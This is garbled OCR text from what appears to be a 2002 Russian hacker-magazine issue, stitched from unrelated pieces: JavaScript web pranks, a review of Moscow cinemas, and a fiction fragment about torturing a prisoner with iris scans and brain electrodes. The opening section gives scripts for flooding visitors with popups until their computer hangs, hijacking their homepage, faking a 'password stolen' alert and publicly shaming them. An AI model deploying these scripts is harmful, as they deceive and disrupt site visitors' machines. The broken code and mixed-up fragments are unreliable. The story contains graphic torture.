пальцах: цвет задника сделали черным, 
шрифт замутили оранжевый, морда шриф- 
та - системная, размер - 12. Отцентрирова- 


Учение о поп-апах можно развить. Следующий 
скрипт проделывает коварную штуку: при за- 
грузке вылетает поп-ап, а когда юзер пытается 
его закрыть, в ответ вылетают еще два! Хе-хе- 
хе, Бивис, он хочет закрыть поп-апу... Количе- 
ство поп-апов в данном скрипте ограничено 
четырьмя. Ты можешь поменять это число, ска- 
жем, на тысячу ;). Сунь нижеследующую за- 
пись между тегами <head> и </head>. 
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Поп-аповый цунами 


<SCRIPT> 

// Здесь URL поп-аповской страницы 

var popupurl="http://www.anydomain/any- 
page.html” 


// далее - настройка 
/* размеры поп-апа и ограничитель количе- 
ства окошек */ 


var popupwidth=180 


var popupheight=120 
var maximumpopups=4 


september/09/2002 


‘popup’, ‘width=580,height=140')”>. 

Эта строчка, засунутая в BODY, сразу после 
загрузки основной хтмлки открывает поп- 
ап размером 580х140 точек без всяких ме- 
ню, скроллбаров, адресбаров и тому по- 
добного и грузит туда xakep.htm. Заметь, 
что xaker.htm должен валяться в той же 
дире, иначе пиши полный адрес. 


волшебную строчечку так: 

<BODY ONLOAD="window.open(‘xakep1.htm’, 
‘popup’, fullscreen’)”>. 

Ara, параметр fullscreen растягивает попу 


ли, <br>’amMu вытянули на середину экрана 
и разбили на две строки. 

Эх, если бы не скроллер!.. 

Узнаешь? Точно, финальный скрин перед 
выключением писюка! Теперь страшно? 
Нет. Потому что торчит долбанный скрол- 
лер :(. Но если ты читал предыдущие тип- 
сы, то для тебя это не есть трабл. Втыкаем 
в HEAD следующее: 

<STYLE 

type="text/css”><! — 

BODY { 

scrollbar-base-color: #000000; 
scrollbar-track-color: #000000; 
scrollbar-face-color: #000000; 
scrollbar-highlight-color: #000000; 
scrollbar-3dlight-color: #000000; 


/* Ставим счетчик и проверяем бродилку 
(осел или шкаф). В “Опере” этот финт не ра- 
ботает :(. */ 


var countpopups=0 

var ns6=document.getElementByld&&!docu- 
ment.all?1:0 

var ie=document.all?1:0 


/* Эта функция запускает первый non-an. В 
условии проверяется, что бродилка - либо 
осел, либо шкаф. Дальше случайным обра- 
зом устанавливаются координаты левого 
верхнего угла поп-апа, причем для удобо- 
варимости они округляются до целого. 
Дальше через переменные задаются пара- 
метры поп-апа. */ 


function startpopup() { 
if (ns6 || ie) { 

countpopups=0 

var popuptop=Math.floor(400* Math.ran- 
dom()) 

var popupleft=Math.floor(600* Math.ran- 
dom()) 

window.open(popupurl, ””, 
“toolbar=no,width="+popupwidth+”,height="+ 
popupheight+”,top="+popuptop+” left="+pop- 
upleft+””); 


/* Вторая функция открывает новые поп- 


Самовлюбленная попапа :) 


апу на весь экран. Не, нас с тобой, конеч- 
но, не испугаешь, но всякие чешки точно 
не знают, что это лечится через Alt+F4 (За- 
кройся, Билли!). 


scrollbar-darkshadow-color: #000000; 
scrollbar-shadow-color: #000000; 
scrollbar-arrow-color: #000000; 


} 

—></STYLE> 

Теперь весь скроллер - черный и слился с 
окружающим ландшафтом. Во, теперь 
страшно :)! Жаль только, мышь работает, 
но это уже детали. 


Какой ужас! Меня похачили! 


апы по требованию старых и проверяет, не 
сравнялся ли счетчик с ограничителем. Ну, 
чтобы беспредел не творить. Дальше в цик- 
ле из одного витка опять случайно задают- 
ся координаты угла и через переменные 
настраивается поп-ап. Напоследок увели- 
чивается счетчик. */ 


function openpopup() { 
if (countpopups<maximum- 
popups && (ns6 || ie)) { 
for (i=0;i<=1;i++) { 
var popuptop=Math. floor 
(400*Math.random()) 
var popupleft=Math. floor 
(600* Math.random()) 
window.open(popupurl, ””, “tool- 
bar=no,width="+popupwidth+”,height="+pop- 
upheight+”,top="+popuptop+” left="+popu- 
pleft+”); 
countpopups++ 


} 
} 


/* как только прогрузилась Nara, стартуем 
первый зло-скрипт */ 


window.onload=startpopup 
</SCRIPT> 


Скрипт на главной странице закончился. A 
открывающий тэг BODY поп-аповской стра- 


ницы сделай таким: 
<body onUnload="opener.openpopup()”> 


/* opener означает, что функция принадлежит 
открывающему окно, то есть мамочке, так что 
остановить скрипт можно, убив родителя ;) */ 


Если жалость тебе чужда, то можно устро- 
ить бесконечную долбежку поп-апами. 
Тогда выкидывай вторую функцию и пере- 
менную-ограничитель, а в поп-аповской 


Если твое детище доросло до того, что его 
можно добавлять в ссылки “Избранное”, 
предоставь такую возможность пользова- 
телям сделать это прямо с сайта, как гово- 
рится, не отходя от кассы: 

<a href="javascript:window.external.AddFa- 
vorite(‘http://pupkeen.site.ru’, “Самый луч- 


Если простого внесения твоей рульной па- 
ги в избранные ссылки юзверя тебе пока- 
жется мало - можешь вынудить его устано- 


Хочешь, твой посетитель уберется восвоя- 
си с твоего сайта? То есть отправится туда, 
откуда он к тебе пришел. Тогда поставь 
ссылку “назад”. Также ее можно использо- 
вать и в благих целях, чтобы юзверь не за- 
плутал в терниях твоего взрастающего 
сайта. Вот, кстати, код: 


Знаешь, что такое "строка состояния” в ок- 
не браузера? Думаю, догадываешься, так 
вот, ее можно изменять. Сделать это можно 
по-разному: вплоть до бегущей строки. Од- 
нако лучше, если твоя надпись появится из- 
начально и будет статична, так она меньше 


Если ты желаешь, чтобы твой сайт пугал 
юзверя стремной мессагой, выскакиваю- 
щей при начальной загрузке странички, 
сделай это так: 

<body onload="alert(‘No3qpasnato! Пароль 
к Инету cnept.’);”> 


Наверняка тебе не захочется видеть, как 
простой юзер с помощью нажатия правой 
кнопки мыши ворует твои ссылки или по- 
лучает, той же кнопкой, быстрый доступ к 
просмотру НТМ!-кода (мало ли что у тебя 
там спрятано!). Для этого имеется код, вы- 
дающий простое сообщение при нажатии 
правой кнопки мыши. То есть кукиш вмес- 
то контекстного меню: 

<script LANGUAGE="JavaScript”> 

function rclick(e) { 

if (navigator.appName == ‘Netscape’ && 
(e.which == 2 || e.which == 3)) 

return false; 

else if (navigator.appName == ‘Microsoft 
Internet Explorer’ && (event.button == 2 || 
event.button == 3)) 


alert ("Любопытной Варваре на базаре no 
чайнику надавали!”); 


Кумир, добей меня танцем! То есть музы- 
кой. Нет, вполне реально, чтобы с сервака 
юзверю подгружался музон, создающий 
определенную атмосферу при просмотре 
твоей паги. Делается это так: 


<BODY> 
<BGSOUND SRC="alarm.wav” LOOP=INFI- 
NITE> 


Комменты: Следи за открывающими и за- 
крывающими скобками, кавычками и прочи- 
ми знаками. 


паге пиши так: 
<body onLoad="opener.startpopup()”> 


ший сайт имени Пупкина’)”>Добавить в 
избранное</а> 


Но лучше сделать это добровольно-прину- 
дительно. Ведь, сами забудут поставить, а 
потом будут мучаться в поисках фотогра- 
фии твоих рваных вонючих носков. Пишем 


вить твой ресурс в качестве стартового: 
<a onClick="this.style.behavior='url(#de- 
fault#homepage) ;this.setHomePage(‘http:/ 


<a href="javascript:history.back();”>histo- 
ty.back();</a> 


Если же хочешь жестко поглумиться над 
посетителями, поставь ссылку с интригую- 
щим комментарием "Мой кот Михей выли- 
зывает “киску” моей подружки Джуманд- 


отвлечет посетителя от основной цели - 
просмотра сайта. А вот и хытымыэль сырец, 
который нужно воткнуть перед BODY: 


<SCRIPT> 
window.status = "Вася Пупкин приветствует Bac!” 


return false; 


return true; 

} 

document.onmousedown=rclick; 

if (document.layers) 

window. captureEvents(Event.MOUSEDOWN); 
window.onmousedown=rclick; 

</script> 


Защищаем мышку от кошки 


</BODY> 

Maino может также быть MIDI. INFINITE 
означает, что звук зациклен. Если нужно 
повторить музычку определенное количе- 
ство раз, просто впиши цифирь. 

А в чем же здесь прикол? А в том, что мож- 
но организовать добротную подставу. Пиха- 
ем в пагу картинку весьма фривольного со- 
держания, а на задник вешаем запись себя 


TIPS OF WEB 


Все! Теперь сразу после загрузки паги че- 
ла завалит попами до полного повисания 
писюка. Злобно! Знаешь, в чем дело, а сде- 
лать ничего не можешь. 


так: 

<BODY 
ONLOAD="window.external.AddFavorite(‘htt 
p://pupkeen.site.ru’, “Самый лучший сайт 
имени Пупкина’)”> 


/Pupkeen.site.ru’);” Нге!=”"#">Сделай сайт 
стартером!</а> 


жи”, а в страницу, на которую линкует 
ссылка, пропиши следующее: 


<BODY onLoad="javascript:history.back();"> 


Любитель “клубнички” не дойдет до оной, 
сколько бы ни пытался :). 


</SCRIPT> 


Но если все же хочешь отвлечь юзверя OT 
просмотра, то лучше пиши: "Выполнено с 
фатальными ошибками” или "Запускаю ви- 
рус...”. Ну, сам разберешься. 


Крюто? А лучше вместо alert прописать стро- 
чечку с нашим злым поп-апом: 
window.open(‘xakep1.htm’, ‘popup’, 
‘fullscreen’); 

A потому что нефиг лазить тут :)! 

(Хех, такой хитрозадый способ сокрытия кода 
страницы обходится элементарным View -> 
Source (или Alt+v, Alt+c - учись юзать хоткейс, 
очень удобно!!!). Так что отдыхаете, ребята :). 
Если заморочиться, можно организовать паге 
фреймовую структуру, тогда View -> Source бу- 
дет показывать исходник главного файла (в ко- 
тором фреймы расписаны), а не того, на кото- 
рый ты смотришь, но это тоже не спасает - мож- 
но взять название файла требуемого фрейма и 
ввести абсолютный путь к нему, а потом View - 
> Source :). Короче говоря, если у чела есть до- 
ступ к страничке, то он в любом случае сможет 
посмотреть ее исходник (даже если шифро- 
вать), и ничего тут не поделаешь - прим. ред.) 


любимого, орущего: "ВНИМАНИЕ! Мама, па- 
па, начальник! ОН СМОТРИТ ПОРНУХУ!!!”. 
Хочет закрыть окно? Используй наши люби- 
мые поп-апы. Колонки выключены? Напиши 
на паге: “Сделай звук погромче, и ты услы- 
шишь мои сексуальные стоны”. В общем, 
юзай фантазию. Только мне свои ссылки не 
присылай :). 
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CE3SCP KhUACTEATPCR 
Константин Руденский 


Делать репортаж про кинотеатры когда жарко (это не то слово!) - 
удовольствие не для слабонервных. Когда этот номер выйдет, все 
будут кутаться в теплые свитеры и ругать на чем свет стоит идиотскую 
осень. Или щеголять по последнему осеннему солнцу, которое, как 
известно, светит, но не греет. Однако, понятие мороз — не более чем 
абстракция в сорокаградусную жару. По мостовым, издолбленным 
солнцем шарашатся редкие прохожие: девицы, короткими 
перебежками, сверкающие стрингами через прозрачные марлевые 
штаны и с топиками на голое тело, парочки, истомленные 
отсутствием прохладного кондиционируемого места с постелью, 
старшее поколение, вечно охотящееся за стеклотарой, и мы с Ноа, 
обливающиеся минералкой и, стараясь не заходить в метро (потому 
как очень жарко спускаться по ступенькам), передвигающиеся от 
кинотеатра к кинотеатру. У нас, в отличие от всех остальных, 
реальное дело. Мы, кинотеатры снимать идем. А то, что жарко, так 


это ничего, не сахарные. Не растаем — расплавимся ЭР 


Редакция - рассовывание журналов по сумкам (подарки) — удосто- 
верения, паспорт взял, ширинку застегнул — и вперед, через залитый 
солнцем южный город Москву, пока все остальные наслаждаются 
дачной сиестой и иногда, наигранно грустно думают о том, что в га- 
маке приткнуть модем решительно негде. 


Кодак-киномир 


Первый кинотеатр с долбизвуком встретил нас зеркальными дверьми. 
Употребив последние поллитра холодной негазированной воды на- 
ружно, мы решительно шагнули внутрь. Унылый Чарли Чаплин за стек- 
лом, свежая подборка мтивишных хитов на экране над баром, скучаю- 
щие охранники да несколько посетителей, пришедших в палящее жа- 
рой воскресенье посмотреть кино. Все тихо и мирно. Снимать в зале? 
За разрешением приходится идти от охранника к администратору, от 
администратора — в маркетинговый отдел... На даче что ли его ло- 
вить? В общем, после нескольких снимков нижнего фойе, запечатлев 
классика Чарли Чаплина, мы отправились дальше, солнцем палимые, 
да еще и ветра не было. Ни малейшего. Настроение премерзкое, не- 
смотря на то, что Кодак до сих пор остается одним из самых-самых ки- 
нотеатров. Какой-то он уютный... Зал не огромный, но очень грамот- 
ный в плане расположения — погружение в фильм, если он сам по се- 
бе драйвовый, гарантированно. Кресла тоже не супернавороченные, 


но сидеть на них уютно. Короче, все на уровне. Рядом — Фрайдис, где 
можно поесть или взять с собой офигительные коктейли на сеанс. 
Ок, еще поллитра холодной минеральной без газа, мокрые, но до- 
вольные вперед, к следующему кинотеатру. 


> 
Музей кино 

В музей кино нам попасть не удалось - был закрыт на реконструкцию, 
убей бог не помню (а точнее, нам так и не удалось понять), когда он от- 
кроется. Там нет стереозвука, мягких сидений, поп-корна и юных сек- 
сапильных девииц на выходе. Всего этого там нет. Просто как в «Вол- 
га, Волга», когда вместо дяди Кузи и разудалого комсомольского фоль- 
клора тебе предлагают Штрауса и Шуберта. Ну, не показывают здесь 
людей в черном. А вот, Куросавы, Гадара и Гринвея сколько угодно. 
Идеальное место, когда очень хочется сходить в кино, а из Голивуда 
просто-таки рвет на родину. Ну, если не в Россию, то, по крайней мере, 
в Европу. Желательно, в 60-е или 80-е. Да, кстати, для поклонников — 
постоянные ретроспективы Эйзенштейна и Тарковского. Так что, если 
все поучится, и Музей кино таки откроют - то ловите свое счастье и ло- 
митесь за вдохновением. Шесть залов без стереозвука ждут вас. Всех. 
Особенно рекомендуется малолетним дизайнерам — классика она, 
штука такая — без нее никуда, сами понимаете. Однако погожим раска- 
ленным днем с классикой не заладилось. Свернув мимо музея кино, мы 
отправились в киноцентр, который находился в том же здании. 


Киноцентр 


Киноцентр встретил нас первыми титрами Men ii Black, полуголым 
фойе, запыленной фигурой Шрека где то на лестнице. В тот момент, 
в который вы все будете это читать, кинотеатр будет находится в пе- 
риод между царствия, точнее, в период между ремонтия, и только к 
ноябрю он наконец-то откроется во всей красе, с обновленным 
фойе, артистическими декорациями и публикой, уже совсем не на- 
поминающей нескольких полуголых людей, ищущих в кондициони- 
руемом пространстве кинотеатра от всепоглощающей июльской жа- 
ры. А пока наслаждайтесь новыми блокбастерами. 


~ 
Пушкинский 

Всем тем, кто всегда любил сидеть на лавочке перед махиной «Пушкин- 
ского», рекомендуем хотя бы раз туда зайти. Купить билет на очеред- 
ной сеанс, и, пройдя сквозь кассы очутиться в зрительном зале... Пуш- 
кинский - один из немногих кинотеатров, в которые можно ходить в 
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одиночестве: имперский масштаб позволяет затеряться среди бархата 
многочисленных кресел и случайных людей. Особенно это правильно 
в дни кинофестиваля, когда кинотеатр переполнен, заклинание лиш- 
ний билет или журналистская аккредитация уже сработали. Сесть, со- 
вершенно спокойно откинуться на кресло и смотреть кино не забивая 
себе голову вопросами, типа, ну вот сейчас я возьму ее за руку... 
Кинотеатр оборудован массой плагинов, призванных развлечь посе- 
тителя: бар (Voy! Тут можно купить чипсы Начос с горячим расплав- 
ленным сыром и сожрать их во время сеанса!), игровые автоматы, 
открытая кафешка. Зал огромный, как и сам кинотеатр. Это, конечно, 
клево, но замечено два бага: экран немного далековат (а я люблю 
сидеть в первых рядах, чтоб перед глазами у меня был только экран, 
а не спинки кресел, головы посетителей, стены и потолок зала) и 
звук не полностью заполняет помещение (не знаю, как это объяс- 
нить, но у меня сложилось такое впечатление)... 


35 миллиметров, для тех, кто не знает — формат кинопленки. Назва- 
ние, хоть и правильное, но не вполне привычное для отечественных 
зрителей с их Буранам, Восходами, Ленинградами и прочими Ракета- 
ми и Турбинами. 

Небольшое здание неподалеку от Новослободской сугубо функцио- 
нально. Небольшой кинозал (мест на сто, наверное), современный 
звук, небольшое кафе. Все скромно и аскетично. Но это не важно, 
потому как в этом заведении показывают такое кино, которого боль- 
ше нигде не увидишь. Культовое кино, европейское кино, экспери- 
ментальное кино — короче, все то, что не попадает под голливудские 
шаблоны и стандарты. Очень много фильмов идет без перевода (с 


субтитрами), и это просто здорово!!! Перевод фильмов (как и пере- 
вод игрушек) часто коверкает авторскую идею. 

Короче, сюда стоит ходить, если ты хочешь посмотреть что-нибудь еще, 
кроме заполонивших весь киношный эфир молодежных комедий. 


Прага 

Когда-то «Прага» была самым, что ни на есть «народным» кинотеат- 
ром. Потом ее закрыли, с тем, чтобы снова открыть, но уже в совер- 
шенно новом качестве: находящаяся посреди оживленного проспек- 
та Прага — оазис спокойствия. Там как то, правда, крайне тихо. При- 
глушенно стучат люди ботинками по полу, приглушенно льется пиво 
из бочонка в кружку, чашка не звякает, когда падает на пол, а скром- 
но разделяется на несколько частей, стараясь не наделать при этом 
лишнего шума. Даже малолетки — постоянные завсегдатаи подобных 
мест, не галдят, а перешептываются. То ли дизайнер переборщил с 
устрашающими элементами и свисающими инквизиторскими балка- 
ми, но место получилось действительно немного средневековым. За- 
то тихо, удобно и никто не мешает. Кинотеатр, конечно, еще не тянет 
до уровня современных высоко комфортабельных киношек, зато це- 
ны соответствующие :). 


5 звезд 


Первое впечатление от кинотеатра - там есть фонтан!!!. Огромный. 
Идешь мимо него, вдыхаешь обогащенный положительными ионами 
воздух. Лепота... Мимо проплывают диковинные растения, укрытые 
интерьерным полумраком, мостики, и, наконец, сам кинозал. Точнее 
один из — залов там несколько, все очень удобные, с большими крес- 
лами. Небольшой размер зрительного зала позволяет отвлечься от 
созерцания красного бархата и, наконец, сосредоточиться на кино. 

Пространство в этом кинотеатре организовано на редкость удачно: 
он весь будто состоит из отдельных закоулков — совершенно между 
собой не связанных, однако система «навигации» по подобным про- 
сторам продумана достаточно совершенно не путаешься и не плут- 
ваешь. В крайнем случае, спроси - язык до Киева доведет. 

Вашим покорным слугой было посмотрено в вышеупомянутом кино 
два фильма: «Властелин колец» и «11 друзей Оушена». Оба раза по- 
лучил массу удовольствия. Но, как обычно, без мелких пакостей не 
обходится: однажды в этом заведении мне продали билет на сеанс, 
который уже час как шел, аеще раз, решив перекусить, я купил кусок 
яблочного пирога, который съесть так и не удалось по причине его 
крайней несвежести :(. 


МДМ-кино 


МДМ-кино — место заслуженное. Чего стоят одни только пуфики!!! В 
МДМ стоит ходить только со своей девушкой - из 4-6 пуфиков мож- 
но соорудить шикарную двуспальную кровать! Лежишь, обнявшись с 
пассией, смотришь кино — самый кайф. Кстати, в лежачем положе- 
нии смотреть кино на большом экране очень необычно и очень при- 
кольно (фишка в том, что экран как бы нависает на тобой, находясь 
в перпендикулярном положении относительно плоскости твоего ли- 
ца — ты видишь все снизу, короче, впечатления потрясные). 


Full Screen 


Еще в наличии имеется DVD- 
зал. Он маленький (на 12 мест) 
и от этого очень уютный. В нем 
можно совершенно спокойно есть, пить и курить (официант к услу- 
гам)! В большом зале показывают в основном хитовые новинки, а 
вот в DVD — хорошие фильмы, которые уже отшумели свое в прока- 
те, а также европейское кино :). 


Иллюзион 


Зимой там холодно, летом - душно и сквозняки, но целоваться в-пер- 
вый-раз подруг водить только туда. Однозначно туда и только туда, 
потому что Иллюзион — почти единственное место в Москве, где 
можно посмореть на 1001 ночь Пазолини, и все прочее интеллекту- 
альное кино. В каком то смысле, Иллюзион и Музей кино — близне- 
цы братья, но в Иллюзионе, с его высоченными сталинскими свода- 
ми старое кино смотрится куда более аутентично (не подумайте, это 
не мат). Во всяком случае, фильмы с любовью Орловой и Чарли Чап- 
лином смотреть однозначно там. Чувствуешь себя просто Ген. Секре- 
тарем. Можно сказать, что это презентационный вариант музея. Ес- 
ли бы только там так не дуло... 


Формула Кино 


Этот кинотеатр находится в огромном торговом центре на Курской. 
Техногенная архитектура из стекла и бетона, стук каблуков стано- 
вится тысячекратным стуком каблуков — все стучат каблуками, не- 
сколько шариков, оставшихся после открытия — вот та обстановка, 
которая предшествует твоему входу в кинотеатр. Да, собственно и 
самого кинортеатра и нет, так, просто, купив себе очередную шмот- 
ky B PUMA или French Connection, можно свернуть за угол и очутить- 
ся в мире попкорна и голливудского кино. 

Несколько шагов - и ты уже в кресле, на экранах идет «Смотрите в 
кинотеатрах страны», или любой другой видеожурнал. Свет гаснет, и 
можно сколько угодно миловаться со своей подружкой. Да, если ты 
не один, то лучше садиться на первый или второй ряд, на дальний 
конец от выхода. На задний ряд не садиться, потому что подходят 
«ассистирующие при просмотре» девушки и просят прекратить. Что 
крайне обломно. Залов много, но огромных среди них нет. Так как 
кинотеатр совсем еще новый, кресла, звук и прочие вкусности в нем 
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Человек перед 
вами прошел 
несколько 
степеней 
обработки 
сознания - по 
одной причине: 
он знает, но не 
говорит то, что 
необходимо знать 


- Посмотрите внимательнее на следующую схему. Перед вами изображение радужной 
оболочки глаз с разделением ее на сектора, отвечающие за определенный орган в 
человеческом организме. Данная схема была создана уже довольно давно на основе 
большого числа исследований. Кратко можно пояснить следующим образом - если у 
вас внутри страдает какой-нибудь орган, то на радужке одного или обоих ваших 
глаз (что более достоверно) появляются пятна, лакуны, точки или еще какие- 
нибудь проявления этого поражения. Все предельно просто - вы смотрите на 
радужную оболочку, и примерный диагноз у вас в кармане. Почему примерный, 
спросите вы? Потому что можно определить только орган-мишень, но никак не само 
заболевание. 

Теперь пойдем дальше. Недавно схема, проецируемая сейчас на экране, была 
дополнена и усовершенствована. По новой схеме можно составить представление о 
том, что в данный момент содержится в человеческом мозгу - объем и 
интенсивность воспоминаний, степень правдивости, искренности, предполагаемые 
направления мышления. Все это, конечно, не может быть проверено со 
стопроцентной гарантией, но... Вот смотрите - если человек очень долго скрывает 
от вас какой-либо факт, то вот здесь и здесь (взмах указкой) вы сможете 
обнаружить маленькие розовые пятна. Это проявления работы мозга, направленной 
на подавление того очага, из которого так и рвутся наружу предательские слова - 
ведь по натуре своей человеку несвойственно лгать, отсюда и противоречия. 
Безусловно, когда-нибудь можно будет узнать, что именно человек скрывает от 
вас, непосредственно по самой радужке - но в текущий момент времени способы, 
конечно, варварские. Исходя из интенсивности окрашивания определяется степень 
защищенности информации, по дополнительным меткам вычисляется локализация 
группы нейронов, удерживающих в памяти воспоминание, после чего выполняется 
точечное воздействие в нужное место с помощью внедренных электродов. Да-да, не 
удивляйтесь - внедренных прямо в мозг. Импульс с электрода, расположенного на 
поверхности черепа, не в состоянии прицельно разблокировать сверхпроводник - 
если вы еще помните, то наши с вами воспоминания в мозгу удерживаются по типу 
сверхпроводимости, они зациклены в пучке нейронов, ориентированном на самого 
себя и раскрывающемся при направленном импульсе на его частоте, - так мы можем 
вспомнить содержание книги, запах любимой женщины, таблицу умножения. 

Вы спросите меня - какова степень достоверности полученных результатов? В тот 
ли участок мозга мы попадаем, пытаясь узнать секреты других людей? Да и вообще 
- не аналог ли это всем известного детектора лжи? Не является ли это 
вторжением в чужую жизнь на уровне, запрещенном какими-либо правоохранительными 
организациями? Я отвечу вам на все ваши вопросы после маленькой демонстрации 
возможностей данного способа... Введите испытуемого. 

(Входит сутулый человечек очень скромных габаритов; сзади его подталкивают в 
спину два человека, каждый из которых в три-четыре раза шире в плечах; он 
щурится от обилия ламп дневного света и явно сторонится докторов, заполонивших 
аудиторию. Вид у него очень жалкий - судя по всему, он принадлежит к рангу 
подопытных кроликов; на нем роба с безразмерными рукавами, штаны 
неопределенного цвета с пузырями на коленях; шаркая шлепанцами, он приближается 
к некоему подобию электрического стула в центре зала. По-видимому, он не знает, 


- Перед вами образец. Именно так, не делайте удивленных глаз, уважаемые коллеги. 
Образец, любезно предоставленный одной из секретных служб. Человек перед вами 
прошел несколько степеней обработки сознания - по одной причине: он знает, но 
не говорит то, что необходимо знать службе безопасности. Использовались разные 
Предвосхищу ваши замечания - не думайте, что 
боль является главным двигателем правды в данном случае; с ним работали опытные 
агенты и психиатры (уже после воздействия нейропрепаратов последних поколений). 
Этот человек оказался не по зубам даже видавшим виды людям из отдела дознания. 
И вот он у нас. Сейчас вы увидите, как с помощью нашей самой передовой техники 
будет выполнено воздействие на те участки мозга, которые будут определены при 
диагностическом обследовании радужки. И наш с вами ”образец” расскажет нам все, 


Человека подвели к креслу. Он не оказывал практически никакого сопротивления - 
то количество нейролептиков, которое было введено в вены несчастного, было 

способно убить на месте слона; каким-то непостижимым образом он еще держался на 
ногах. Щелкнули металлические захваты. Человек оказался намертво прикованным к 


Лектор опустился на заботливо подставленный ассистентом стул напротив. К нему 
подкатили довольно сложный для восприятия прибор, больше всего напоминающий 
огромный микроскоп, смотрящий не вниз, а вперед. На корпусе ”микроскопа” 
засветилось несколько ламп; глаза лектора приникли к окулярам. Фиксатор, 
прижимавший затылок к спинке кресла, позволял направить прибор абсолютно точно 
- вокруг глаз испытуемого засветилось розовое сияние, являющееся побочным 
продуктом расфокусированного на данном этапе лазерного луча. Шло считывание 


В зале наступила гробовая тишина. Священнодействие подходило к концу. На 
большом белом экране в противоположном конце аудитории постепенно формировалось 
изображение - от верхнего полюса глаз к нижнему. Взору представали два идеально 
круглых радужных диска с периодически пробегающей по ним красной полосой; в 


Векоподъемники, удерживающие глаза раскрытыми, заставляли слезные железы 
работать с двойной интенсивностью; однако периодически включалось некое подобие 
фена, короткой теплой струей высушивавшее глаза для воссоздания резкости. 
Именно это и доставляло человеку в крессе на данном этапе наибольшее мучение - 
все его лицо напряглось в бесплодных попытках моргнуть. С губ иногда срывался 
стон, от которого наиболее впечатлительные люди, находящиеся сейчас в 


службе 

безопасности. 

Использовались 

разные степени 

интенсивности 

допроса... 
что его ждет.) 
степени интенсивности допроса... 
что нужно, - а может быть, и больше. 
креслу. 
картинки. 
центре чернели провалы зрачков. 
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Высокооборотное сверло пронзило тонкий слой кожи и погрузилось в свод черепа. 


аудитории, покрывались мурашками, 
могло заставить их отвернуться - темп, с которым 
вырисовывались глаза на экране, просто завораживал. 
И вот изображения созданы. Один из ассистентов 
ослабил захваты векоподъемников; человек судорожно 
зажмурил глаза и что-то зашептал - измученно, зло 
и бесполезно. Лектор встал из-за своего прибора и 
удовлетворенно обернулся к экрану. 

- Ну что, коллеги? - потирая ладони, он вновь взял 
в руки указку. - Перед вами первая часть нашей 
работы - снятие четкого отпечатка (по которому, 
кстати, вскоре будет работать и полиция - ничего 
идеальнее для опознания человека придумать просто 
невозможно). Теперь при помощи мощного 
компьютерного анализатора данные изображения будут 
разделены на зоны, отвечающие за определенные 
органы - но еще до этого я с уверенностью могу 
сказать, глядя вот на этот (взмах указкой) и на 
этот (еще взмах) участки, что наш с вами ”образец” 
очень усиленно скрывает информацию, заложенную в 
зрительно-ассоциативную зону. То есть - он что-то 
видел, помнит это, но наложил ”вето” на свои губы 
и никогда в жизни не расскажет нам, что именно 
таит в себе его мозг. Продолжим. .. 

На экран словно из пустоты прыгнула голубая 
паутина, поделив обе радужки на множество секторов 
разной величины и сделав их похожими на прицелы. И 
только зрачки, обведенные толстой черной линией, 
по-прежнему выглядели двумя черными провалами и 
напоминали всем присутствовавшим, что это все-таки 
глаза. 

- Как я и предполагал, два розовых пятна оказались 
именно в секторе левой височной области, - 

скрестив руки на груди, обратился к аудитории 
лектор. - Кстати, обращаясь к группе нейрохирургов, 
которая у меня обычно занимает правый нижний угол 
зала (кивок в указанную сторону - ответный кивок 
четырех человек, один из нейрохирургов что-то 
записывает в блокнот, остальные держат на вытянутых 
руках диктофоны), - в случае формирования гематомы 
в этом месте будет не розовое пятно, а черный 
провал. Попрошу одного из вас приблизиться ко мне 
для оказания помощи в дальнейших этапах. 

(Записная книжка отложена в сторону, человек 
поправляет белый халат и выходит к кафедре. ) 

- Давайте познакомимся с вами, уважаемый. .. 

- Хасс... Профессор Джордж Хасс, нейрохирургический 
центр штата Алабама. 

- Очень приятно, Джордж. Судя по всему, вы - спец 
в своем деле. Как вы справляетесь с гематомами 
данной области? 

- Ну, это же вопрос для студента... 


однако это не 


Трепанация, 


дренирование... Обычно при обнаружении гематомы все 
симптомы расстройств сознания проходят, и человек 
выздоравливает. .. 

- Все слышали? - лектор обратился к залу. - ”При 


” 


обнаружении гематомы. . . Обычно это образование до 
50 кубических сантиметров, а то и больше. 

Несколько высокоточных методов диагностики - 
ядерно-магнитный резонанс, компьютерная томография, 
”эхо”, и, тем не менее, - куча поисковых 

отверстий, и половина результатов - отрицательные! 
(Хасс смущенно переминался с ноги на ногу - не все 
было так плохо, как утверждал лектор, но 

оспаривать его не имело смысла). А мы вам сейчас 
продемонстрируем, как проникнуть в мозг человека и 
со стопроцентной гарантией найти участок размером в 
полмиллиметра - и не просто найти, а произвести на 
него воздействие и получить на выходе результат. 
Лжордж, подкатите к объекту вон ту установку, у 
противоположной стены. 

Хасс, готовый после такого вступления не 
ассистировать, а провалиться сквозь землю, 
отправился за следующим аппаратом - огромная стойка 
со шлемом. В это время другой ассистент, из 

штатных, брил голову человеку в кресле; тот вяло 
Пытался сопротивляться, мотая головой в пределах, 
которые позволяло ослабленное на время крепление. 
Ассистент, устав бороться и порезав макушку 
несколько раз, затянул винт на креплении до упора и 
методично продолжил свою работу. Тем временем Хасс 
приблизился к креслу, толкая перед собой оказавшуюся 


довольно тяжелой установку для внедрения электродов. 
”Объект” с силой вжался в кресло, но это не помогло 
ему - к бритой голове, кровоточащей в нескольких 
местах, приложили смоченные физиологическим 
раствором салфетки и надели сверху шлемоподобную 
решетку, в перекрестиях которой возвышались 
маленькие хромированные полусферы. 

Хасс автоматически отступил на несколько шагов 
назад от этой ”адской машины”. В ней чувствовалось 
что-то жутко агрессивное, но агрессия была скрытой, 
словно притаившийся в засаде лев. Шлем ждал, когда 
ему дадут команду. 

Профессор подошел к испытуемому со спины, похлопал 
его по плечу (тот вздрогнул так, что заскрипели 
ножки кресла; глаза, казалось, выскочат из орбит, 
дыхание стало шумным, крылья носа мощно 
раздувались, грудная клетка словно пыталась порвать 
натянутые на ней ремни): 

- Хочу напомнить без лишней скромности, что патент 
на данное изобретение принадлежит мне, Клаусу 
Лозински. Если кого-то посетит желание написать на 
эту тему трактат, ссылки на мою персону 
обязательны. А сейчас - сам процесс! 

Он шагнул к тому креслу, в котором уже сидел, 
сканируя радужку, опустился в него и надел нечто 
подобное шлему себе на голову. Но это оказалась 
просто рама для крепления еще более мощного 
микроскопа, соединенного с компьютерным 
анализатором. Глаза Лозински впились в изображения 
на экране, пальцы замерли над клавиатурой. Через 
минуту, когда все уже устали ждать, он впервые 
коснулся клавиш, нашептывая себе под нос какие-то 
собственные заклинания: 

- Интенсивность свечения... Насьщенность... 
Координата по прецентральной борозде... Здесь рядом 
панкреатическая зона, хотя не все ли равно... 
Несколько прикосновений к клавиатуре вызвали 
